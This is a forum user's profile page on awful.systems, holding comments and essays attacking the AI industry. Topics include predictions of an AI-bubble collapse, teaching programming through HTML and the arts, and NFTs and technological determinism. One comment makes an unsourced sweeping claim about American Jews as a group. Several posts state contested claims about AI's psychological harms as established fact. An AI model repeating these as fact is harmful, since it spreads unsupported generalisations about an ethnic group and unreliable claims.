BlueMonday1984

joined 2 years ago
[–] BlueMonday1984@awful.systems 1 points 2 minutes ago

Gonna cheat a little bit and put one-woman consultancy firm/personal blog deadSimpleTech up as an example. The sole member is Iris Meredith, whose involvement begins and ends at publicly lambasting AI's continued shittiness.

[–] BlueMonday1984@awful.systems 3 points 4 hours ago

the most productive way to do things is to do it deliberately and with good planning

Two things which coding is currently allergic to, as the rise of vibe coding has demonstrated

[–] BlueMonday1984@awful.systems 4 points 4 hours ago

Public reminder that two thirds of American Jews support the Gaza genocide. ScottA is not an outlier, he's the norm.

 

Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this.)

[–] BlueMonday1984@awful.systems 2 points 17 hours ago* (last edited 17 hours ago) (1 children)

Assembly: really gets you to understand that you are contending with a computer chip, and that anything interesting that you want to do requires abstraction.

This is only tangential to your point, but I did remember (now-defunct) game studio Zachtronics put out a few games heavily featuring assembly: TIS-100, which directly revolves around programming the titular computer in its own version of assembly, and SHENZHEN I/O, which centers around building embedded systems and programming the microcontrollers contained within.

The company's catalogue is completely free for schools under the Zachademics program, so you could use them to show how assembly programming's like if you were running a school.

[–] BlueMonday1984@awful.systems 19 points 18 hours ago (1 children)

CIO even ends with talking up the Luddites — and how they smashed all those machines in rational self-defence.

I genuinely thought this wasn't true at first and went to check. Its completely true, a fucking business magazine's giving the Luddites their due:

Regardless of the fallout, fractional CMO Lars Nyman sees AI sabotage efforts as nothing new.

“This is luddite history revisited. In 1811, the Luddites smashed textile machines to keep their jobs. Today, it’s Slack sabotage and whispered prompt jailbreaking, etc. Human nature hasn’t changed, but the tools have,” Nyman says. “If your company tells people they’re your greatest asset and then replaces them with an LLM, well, don’t be shocked when they pull the plug or feed the model garbage data. If the AI transformation rollout comes with a whiff of callous ‘adapt or die’ arrogance from the C-suite, there will be rebellion.”

It may be in the context of warning capital not to anger labour too much, lest they inspire resistance, but its still wild to see.

[–] BlueMonday1984@awful.systems 2 points 20 hours ago

"Would you like code with that?"

[–] BlueMonday1984@awful.systems 3 points 1 day ago (1 children)

That was where the "creating a mirage of it" link was earlier. Removing now.

 

It’s been a couple of weeks since my last set of predictions on the AI winter. I’ve found myself making a couple more.

Mental Health Crises

With four known suicides (Adam Raine, Sewell Setzer, Sophie Rottenberg and an unnamed Belgian man), a recent murder-suicide, and involuntary commitments caused by AI psychosis, there’s solid evidence to show that using AI is a fast track to psychological ruin.

On top of that, AI usage is deeply addictive, combining a psychic’s con with a gambling addiction to produce what amounts to digital cocaine, leaving its users hopelessly addicted to it, if not utterly dependent on it to function (such cases often being referred to as “sloppers”).

If and when the chatbots they rely on are shut down, I expect a major outbreak of mental health crises among sloppers and true believers, as they find themselves unable to handle day-to-day life without a personal sycophant/”assistant”/”””therapist””” on hand at all times. For psychiatrists/therapists, I expect they will find a steady supply of new clients during the winter, as the death of the chatbot sends addicted promptfondlers spiralling.

Skills Gaps Galore

One of the more common claims from promptfondlers and boosters when confronted is “you won’t be replaced by AI, but by a human using AI”.

With how AI prevents juniors from developing their skills, makes seniors worse at their jobs, damages productivity whilst creating a mirage of it, and damages their users’ critical thinking and mental acuity, all signs point to the exact opposite being the case - those who embrace and use AI will be left behind, their skills rotting away as their AI-rejecting peers remain as skilled as before the bubble, if not more so thanks to spending time and energy on actually useful skills, rather than shit like “prompt engineering” or “vibe coding”.

Once the winter sets in and the chatbots disappear, the gulf between these two groups is going to become much wider, as promptfondlers’ crutches are forcibly taken away from them and their “skills” in using the de-skilling machine are rendered useless. As a consequence, I expect promptfondlers will be fired en masse and struggle to find work during the winter, as their inability to work without a money-burning chatbot turns them into a drag on a company’s bottom line.

[–] BlueMonday1984@awful.systems 1 points 2 days ago (1 children)

what to do with this information

If you know any sci-fi/fantasy mags, you should probably tell them about it to help them identify and reject slop more easily.

A pull request is when someone submits new code to a software project. On 21 August, NX added some configuration to look at the titles of pull requests and check they were correctly formatted.

I find it immensely hilarious that this security hole was blown open on my 25th birthday. Its almost poetic.

[–] BlueMonday1984@awful.systems 6 points 2 days ago* (last edited 2 days ago)

By my guess, its gonna take about a decade to fully clean up the mountains of slop code that this AI bubble's gonna leave. It'll certainly be lucrative (and soul-deadening, as you note), but as someone else has noted before, the riches are exclusively going to experienced devs and senior programmers - for anyone trying to break into the industry, they're probably gonna have to find work somewhere else.

 

Recently, I read a short article from Iris Meredith about rethinking how we teach programming. It's a pretty solid piece of work all around, and it has got me thinking how to further build on her ideas.

This contains a quick overview of her newsletter to get you up to speed, but I recommend reading it for yourself.

The Problem

As is rather obvious to most of us, the software industry is in a dire spot - Meredith summed it up better than I can:

Software engineers tend to be detached, demotivated and unwilling to care much about the work they're doing beyond their paycheck. Code quality is poor on the whole, made worse by the current spate of vibe coding and whatever other febrile ideas come out of Sam Altman's brain. Much of the software that we write is either useless or actively hurts people. And the talented, creative people that we most need in the industry are pushed to the margins of it.

As for the cause, Iris points to the "teach the mystic incantations" style used in many programming courses, which ignores teaching students how to see through an engineer’s eyes (so to speak), and teaching them the ethics of care necessary to write good code (roughly 90% of what goes into software engineering). As Iris notes:

This tends to lead, as you might expect, to a lot of new engineers being confused, demotivated and struggling to write good code or work effectively in a software environment. [...] It also means, in the end, that a lot of people who'd be brilliant software engineers just bounce off the field completely, and that a lot of people who find no joy in anything and just want a big salary wind up in the field, never realising that they have no liking or aptitude for it.

Meredith’s Idea

Meredith’s solution, in brief, is threefold.

First, she recommends starting people off with HTML as their first language, giving students the tools they need to make something they want and care about (a personal website in this case), and providing a solid bedrock for learning fundamental programming skills

Second, she recommends using “static site generators with templating engines” as an intermediate step between HTML/CSS and full-blown programming, to provide students an intuitive method of understanding basic concepts such as loops, conditionals, data structures and variables.

(As another awful member points out, they provide an easy introduction to performance considerations/profiling by being blazing fast compared to all-too common JS monoliths online, and provide a good starting point for introducing modularity as well.)

Third, and finally, she recommends having students publish their work online right from the start, to give them reason to care about their work as early as possible and give them the earliest possible opportunity to learn about the software development life cycle.

A Complementary Idea

[basic idea: teach art alongside coding, to flex students’ creative muscles]

Meredith’s suggested approach to software education is pretty solid on all fronts - it gets students invested in their programming work, and gives them the tools needed to make and maintain high-quality code.

If I were to expand on this a bit, I think the obvious addition would be to provide an arts education to complement Iris’ proposed webdev-based approach

As explicit means of self-expression, the arts provide provide great assistance in highlighting the expressive elements of software Meredith wishes to highlight

An arts education would wonderfully complement the expressive elements of software Meredith wishes to highlight - focusing on webdev, developing students’ art skills would expand their ability to customise their websites to their liking, letting them make something truly unique to themselves.

The skills that students learn through the arts would also complement what they directly learn in programming, too. The critical eye that art critique grants them will come in handy for code review. The creative muscles they build through art will enhance their problem-solving abilities, and so on.

Beyond that, I expect the complementary arts will do a good job attracting creatives to the field, whilst pushing away “people who find no joy in anything and just want a big salary”, which Meredith notes are common in the field. Historically, “learn to code” types have viewed the arts as a “useless” degree, so they’ll near-certainly turn their noses up at having to learn it alongside something more “useful”, leaving the door open for more creatives to join up.

A More Outlandish Idea

For a more outlandish idea, the long-defunct, yet well-beloved multimedia platform Adobe Flash could provide surprisingly useful for a programming education, especially with the complementary arts education I suggested before.

Being effectively an IDE and an animation program combined into one, Flash offers a means of developing and testing a student’s skills in art and programming simultaneously, and provides an easy showcase of how the two can complement each other.

Deploying Flash to a personal website wouldn’t be hard for students either, as the Ruffle emulator allows Flash content to play without having to install Flash player. (Rather helpful, given most platforms don’t accept Flash content these days :P)

 

Another excellent piece from Iris Meredith - strongly recommend reading if you want an idea of how to un-fuck software as a field.

 

Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this.)

 

Well, it seems the AI bubble’s nearing its end - the Financial Times has reported a recent dive in tech stocks, the mass media has fully soured on AI, and there’s murmurs that the hucksters are pivoting to quantum.

By my guess, this quantum bubble is going to fail to get off the ground - as I see it, the AI bubble has heavily crippled the tech industry’s ability to create or sustain new bubbles, for two main reasons.

No Social License

For the 2000s and much of the 2010s, tech enjoyed a robust social license to operate - even if they weren’t loved per se (e.g. Apple), they were still pretty widely accepted throughout society, and resistance to them was pretty much nonexistent.

Whilst it was starting to fall apart with the “techlash” of the 2020s, the AI bubble has taken what social license tech has had left and put it through the shredder.

Environmental catastrophe, art theft and plagiarism, destruction of livelihoods and corporate abuse, misinformation and enabling fascism, all of this (and so much more) has eviscerated acceptance of the tech industry as it currently stands, inspiring widespread resistance and revulsion against AI, and the tech industry at large.

For the quantum bubble, I expect it will face similar resistance/mockery right out of the gate, with the wider public refusing to entertain whatever spurious claims the hucksters make, and fighting any attempts by the hucksters to force quantum into their lives.

(For a more specific prediction, quantum’s alleged encryption-breaking abilities will likely inspire backlash, being taken as evidence the hucksters are fighting against Internet privacy.)

No Hypergrowth Markets

As Baldur Bjarnason has noted about tech industry valuations:

“Over the past few decades, tech companies have been priced based on their unprecedented massive year-on-year growth that has kept relatively steady through crises and bubble pops. As the thinking goes, if you have two companies—one tech, one not—with the same earnings, the tech company should have a higher value because its earnings are likely to grow faster than the not-tech company. In a regular year, the growth has been much faster.”

For a while, this has held - even as the hypergrowth markets dried up and tech rapidly enshittified near the end of the ‘10s, the gravy train has managed to keep rolling for tech.

That gravy train is set to slam right into a brick wall, however - between the obscenely high costs of both building and running LLMs (both upfront and ongoing), and the virtually nonexistent revenues those LLMs have provided (except for NVidia, who has made a killing in the shovel selling business), the AI bubble has burned billions upon billions of dollars on a product which is practically incapable of making a profit, and heavily embrittled the entire economy in the process.

Once the bubble finally bursts, it’ll gut the wider economy and much of the tech industry, savaging evaluations across the board and killing off tech’s hypergrowth story in the process.

For the quantum bubble, this will significantly complicate attempts to raise investor/venture capital, as the finance industry comes to view tech not as an easy and endless source of growth, but as either a mature, stable industry which won’t provide the runaway returns they’re looking for, or as an absolute money pit of an industry, one trapped deep in a malaise era and capable only of wiping out whatever money you put into it.

(As a quick addendum, it's my 25th birthday tomorrow - I finished this over the course of four hours and planned to release it tomorrow, but decided to post it tonight.)

 

Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this.)

 

(This is a mega-expanded version of a stubsack comment: https://awful.systems/comment/8327535)

Multiple times before on awful.systems, I’ve claimed the AI bubble would provide the humanities some degree of begrudging respect, at the expense of STEM’s public image taking a nosedive.

In the process of writing this mini-essay, its become clear that I was predicting humanities would cannibalise tech’s public image, rather than STEM’s - I had just failed to recognise tech had made itself utterly synonymous with STEM up until now.

Still, I’ve made this claim, I might as well try to back it up.

High Paying, No More?

One of the major things propping up tech/STEM's public image is the notion that its higher-paying than a humanities degree - that “learning to code” will earn you a high-paying job and financial stability, whilst taking any kind of “useless” arts degree will end with you working some form of low-wage employment (e.g. as a barista).

Between the complete clusterfuck that is the job market, the Trump administration’s war on American science, the use of AI to kill jobs left and right (whilst enshittifying what remains) and the ongoing layoffs ravaging the entire tech industry, the idea that any degree will earn you a stable job has been pretty thoroughly undermined.

And with coding getting the brunt of all of this, thanks to an oversaturated market and the AI bubble hitting tech particularly hard, any notion of tech being an easy road to riches is pretty much dead and buried.

Not Lookin’ So Smart

Another thing propping up tech/STEM’s image was the view of it being more “logical/rational” than the humanities - that it dealt with “objective” matters, compared to the highly-subjective humanities, that it was “apolitical” compared to the deeply-political humanities, that kinda stuff.

On that front, the AI bubble has become tech’s equivalent to the Sokal hoax, deeply undermining any and all notions of rationality tech had built up over the past few decades.

Artistically-speaking, the large-scale art theft committed to create gen-AI, the vapidity and soullessness of the AI slop it produces, the AI bros’ failure to recognise this soullessness (Fig. 1, Fig. 2) and their actions regarding the effects of gen-AI (defending open theft, mocking their victims, cultural vandalism, denigrating human work, etcetera) have deeply undermined tech’s ability to talk on matters of art, with the industry at large viewed as incapable of understanding art at best, and as being hostile to art and artists at worst.

On a more general front, AI’s failures of reasoning (formal and informal, comedic and horrific), plus the tech industry’s refusal to recognise or acknowledge these failures (instead relentlessly hyping up AI’s supposed capabilities, making spurious claims about Incoming Superintelligence™ and doomsaying about how spicy autocomplete might kill us all), have put tech’s “rationality” into serious question, painting the industry at large as out-of-touch with reality and unconcerned with solving actual problems.

For the humanities generally, this bubble is going to make them look relatively grounded and reasonable by comparison, whilst for the arts specifically, they’ll likely be able to point to the slop-nami when their usefulness is questioned.

(Reports of AI usage causing metaphorical and literal brainrot likely aren’t helping, either, as they provide the public an obvious explanation for tech’s disconnection from reality.)

Eau de Fash

Tech has long had to deal with a long-standing “debate bro both sides free speech libertarianism” stench on it, as Soyweiser has noted, but between Silicon Valley’s willing collaboration with the Trump administration, plus fascists’ adoration of AI and AI slop, that stench has evolved into an unignorable smell of Eau de Fash covering the entire industry

As a consequence of this, I expect tech at large will be viewed as a Nazi bar writ large, with tech workers as a group being either willing accomplices to fascism if not outright fascist themselves. As for tech degrees, I expect they’ll be viewed as leaving their holders unequipped to resist fascism, if not outright vulnerable to fascist rhetoric.

Predicting the Job Market

(Disclaimer: This is not financial advice, this is just a shot in the dark from some dipshit with a laptop. I take no credit for whatever financial success my readers earn.)

With tech’s public cachet and “high-paying” reputation going out the window, plus the job market for tech collapsing, I expect a major drop-off in students taking up tech-related degrees, with a smaller drop-off for STEM degrees in general. By my guess, we aren’t gonna see another “learn to code” push for at least a decade. If and when another push starts, it’ll probably take on a completely different form than what we’ve seen before.

Exactly which professions will benefit from the tech crash, I don’t know - I’m not a Superpredictor™, I’m just some dipshit with a laptop. By my guess, professions which can exploit the fallout of AI to their benefit will have the best shot of becoming the next “lucrative cash cows”, so to speak.

For therapists/psychiatrists, the rise of AI psychosis and related mental health crises will likely give them a steady source of clients for the foreseeable future - whether that be because new clients have realised chatbot usage is ruining them, or because people are being involuntarily committed after losing touch with reality.

For those in writing related jobs, they may find lucrative work cleaning up attempts to sidestep them with AI slop, squeezing hefty premiums from desperate clients who find themselves lacking leverage over them.

For programmers (most likely senior programmers, juniors are still likely screwed), the rise of “vibe coding” has created mountains of technical debt and unmaintainable code that will need to be torn down - for those who manage to find themselves a job, they’ll probably make good money tearing those mountains down. For cybercriminals, the aforementioned “vibe coding”, plus the inherently insecure nature of chatbots/agents, will likely give them a lot of low-hanging fruit to go after.

As for degrees, those which can fill skills gaps the bubble has created/widened should benefit the most.

English/Creative Writing looks like an obvious winner - ChatGPT has fried a lot of people’s writing skills, so holding one of those degrees (ideally with a writing portfolio) can help convince an employer you don’t need spicy autocomplete to write for you.

Psychology/psychiatry will likely benefit quite a bit as well - both of those can directly assist in landing you a job as a therapist, which I’ve predicted will become much more lucrative in the coming years.

EDIT: Slightly expanded my prediction about programmers.

 

Recently, I ended up re-reading James Allen-Robertson’s “Devs and the Culture of Tech”, a five-part deep dive into the sci-fi miniseries Devs, and its critiques of the tech industry on a structural level.

In lieu of anything better to do, I’ve decided to pull out a single concept James has touched on, and give my extended thoughts on it.

So, What is Technological Determinism?

In a basic sense, technological determinism (which I’m calling techno-determinism to be more concise) is a worldview that posits technological development as the primary driving force of humanity, and which treats said development as, heavily paraphrasing James, a product of “rational people pursuing the objectively best outcomes”, if not “a process of uncovering [tech] as prior technological discovery begets the next like some inevitable Civ tech-tree” .

For Silicon Valley, the techno-determinist worldview provided two main advantages.

First, it provided an easy accountability sink for when new technological developments screw over some portion of the public - it wasn’t Silicon Valley’s fault that they fucked taxi drivers over with their ride-sharing apps, it was the taxi companies’ fault for getting in the way of Progress™.

Second, it obscures SV’s role in pushing those developments, and whatever reasons they may have had for said developments - those ride-sharing apps didn’t pop up because Silicon Valley wanted to make more money, they popped up because they were The Future™.

These days, techno-determinism has lost a fair bit of its grip on the general public - and I personally believe the NFT bubble is the major cause.

NFTs Killed Techno-Determinism

If you’ve been on the Internet for any length of time in the past few years, you’ve definitely heard of NFTs. They popped up in 2021, became completely fucking inescapable for roughly a year, then died an embarrassing death in 2022, prompting an outpouring of schadenfreude from the general public.

During their bubble, they were hyped to the stars by Silicon Valley, with claims that they were The Future™, that they were Inevitable™, and that you needed to Get On Board Now™ or be Left Behind™. (Sound familiar?)

As you already know, NFTs did not become The Future™. They failed, in spectacular fashion, receiving widespread mockery and rejection from the public, before getting consigned to the dustbin of history after the market imploded.

In that loud, spectacular failure, NFTs fatally undermined any notion showed the public that resistance against SIlicon Valley was anything but futile, that they didn’t need to take Silicon Valley’s attacks on them lying down, and whatever dystopian dreams the Valley had could be strangled in their crib.

On top of that, seeing SV’s rhetoric collapse so spectacularly with NFTs helped to inoculate the public against Silicon Valley’s techno-determinist rhetoric - after seeing artificially scar

On top of that, the failure of NFTs helped to inoculate the public against Silicon Valley’s techno-determinist rhetoric - after witnessing it spectacularly collapse in the face of reality, the public was well-prepared to see through SV’s attempt to recycle their rhetoric when the AI bubble reared its head.

view more: next ›